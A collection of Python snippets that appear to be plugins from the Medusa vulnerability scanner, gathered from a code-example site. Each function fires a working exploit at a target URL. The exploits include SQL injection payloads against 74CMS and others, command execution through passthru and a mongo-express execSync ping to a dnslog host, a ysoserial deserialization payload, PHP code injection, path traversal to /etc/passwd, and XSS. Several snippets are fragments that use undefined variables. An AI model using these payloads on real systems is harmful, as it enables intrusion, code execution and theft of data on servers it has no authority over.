Exemplo n.º 1
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=5,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if con.lower().find('bbbmicrosoft') != -1:
            Medusa = "{}存在用友OA_cm_info_content_sqli存在sql注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 2
0
def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        s = requests.session()
        resp = s.post(payload_url, data=data, headers=headers, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('''{"response":"Success","details":"}''') != -1 :
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 3
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=5,
                            verify=False)
        con = resp.text
        if con.lower().find('datapassword') != -1:
            Medusa = "{} 存在泛微数据库配置泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 4
0
def medusa(Url,RandomAgent,ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(1),3%23"
        payload2="/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6,  verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp2.status_code
        code2 = resp2.status_code
        if (code==200 and con.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) or (code2==200 and con2.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) :
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            web=ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 5
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers,timeout=5, verify=False)
        con=resp.text
        con_hader=resp.headers
        code = resp.status_code
        if code== 500 and con.find('{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}') != -1 and con_hader['kbn-name']=="kibana":
            Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类


#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
Exemplo n.º 6
0
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/5clib/Inuseraction.action?actionkind=reg"

        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('isIdCards()') != -1 and con.find(
                'addressprompt') != -1:
            Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 7
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    payload_url = scheme+"://"+url+':'+str(port)+'/user.action?'+payload
    host=url+':'+str(port)
    headers = {
        'Host':host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent':RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '571',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }
    try:
        s = requests.session()
        resp = s.get(payload_url,headers=headers, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code==200 and con.lower().find('root')!=-1 and con.lower().find('/bin/bash')!=-1:
            Medusa = "{}存在Struts2远程代码执行漏洞 \r\n漏洞详情:\r\n影响版本:2_1_0-2_3_13\r\nPayload:{}\r\n".format(url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 8
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    for turl in urls:
        try:
            payload_url = scheme + "://" + url + ':' + str(
                port) + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=5,
                                verify=False)
            con = resp.text
            code = resp.status_code
            if con.lower().find('active internet connections') != -1:
                Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 9
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/lib/filemanager/imagemanager/images.php?deld=../../"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('404') == -1 and con.find(
                'Not Found') == -1 and con.find('未找到') == -1:
            Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 10
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=%E4%BC%9A%E8%AE%A1%%27%20and%20w_hot%20like%20%27%1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("'会计%' and w_hot like '%1'") != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 11
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect" + "%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 12
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/checkValid"
        payload_url = scheme + "://" + url +":"+ str(port)+ payload
        dns=Dnslog()
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(dns.dns_host())

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Authorization': 'Basic YWRtaW46cGFzcw==',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '123'
        }
        s = requests.session()
        s.post(payload_url,data=data,headers=headers, timeout=6, verify=False)
        time.sleep(10)
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(url,payload_url,data)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 13
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ':' + str(port) + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=5,
                                verify=False)
            con = resp.text
            code = resp.status_code
            pattern = re.search(
                "[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}", con)
            if pattern:
                Medusa = "{} 存在用友a8 log泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
        except:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 14
0
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        dns=Dnslog()
        YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
        subprocess.Popen(["java", "-jar", YsoserialPath, "CommonsCollections5", "ping "+dns.dns_host()], stdout=subprocess.PIPE)
        time.sleep(5)
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(url,scheme + "://" + url +":"+ str(port),dns.dns_host(),dns.dns_text())
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
Exemplo n.º 15
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("ca4238a0b923820dcc509a6f75849") != -1:
            Medusa = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 16
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%281%29%20style=%22%22"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                '" autofocus onfocus=alert(1) style=') != -1:
            Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.Low()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 17
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "42%20and%201=2"
        payload2="42%20and%201=1"
        payload_url = scheme + "://" + url +":"+ str(port) +"/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn&para137=1&para186=1&para138=1&para139=1&para140=1&id="+ payload
        payload_url2 = scheme + "://" + url + ":" + str(
            port) + "/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn&para137=1&para186=1&para138=1&para139=1&para140=1&id=" + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6,  verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        code2 = resp.status_code
        if code== 200 and code2== 200 and con.find('反馈已经被关闭') != -1 and con2.find('验证码错误') != -1 and con!=con2:
            Medusa = "{}存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}\r\n{}".format(url,payload_url,con,con2)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 18
0
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/search.php"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme+'://'+url,
            'Referer':payload
        }

        resp = requests.post(payload_url, headers=headers, data=payload_data,proxies=proxies,timeout=5, verify=False)
        con=resp.text
        code = resp.status_code
        if code== 200 and con.find('System') != -1 and con.find('Compiler') != -1 and con.find('Build Date') != -1 and con.find('IPv6 Support') != -1 and con.find('Configure Command') != -1:
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 19
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload1 = "/available_seat.php?hid_Busid=2"
        payload2 = "/available_seat.php?hid_Busid=2 AND sleep(5)"
        payload_url1 = scheme + "://" + url +":"+ str(port)+ payload1
        payload_url2 = scheme + "://" + url + ":" + str(port) + payload2

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        start_time = time.time()
        resp = requests.get(payload_url1,headers=headers, timeout=6, verify=False)
        end_time_1 = time.time()
        resp2 = requests.get(payload_url2, headers=headers, timeout=6, verify=False)
        end_time_2 = time.time()
        delta1 = end_time_1 - start_time
        delta2 = end_time_2 - end_time_1
        con = resp2.text
        if (delta2 - delta1) > 4:
            Medusa = "{}存在AdvancedBusBooking脚本SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url2,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 20
0
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/5clib/kindaction.action"
        data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('system.ini') != -1:
            Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 21
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ':' + str(port) + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.post(payload_url,
                                 data=post_data,
                                 headers=headers,
                                 timeout=5,
                                 verify=False)
            con = resp.text
            code = resp.status_code
            if con.lower().find('a8 management monitor') != -1 and con.lower(
            ).find('connections stack trace') != -1:
                Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                    url, payload_url, post_data)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
        except:
            _ = VulnerabilityInfo('').info.get('algroup')
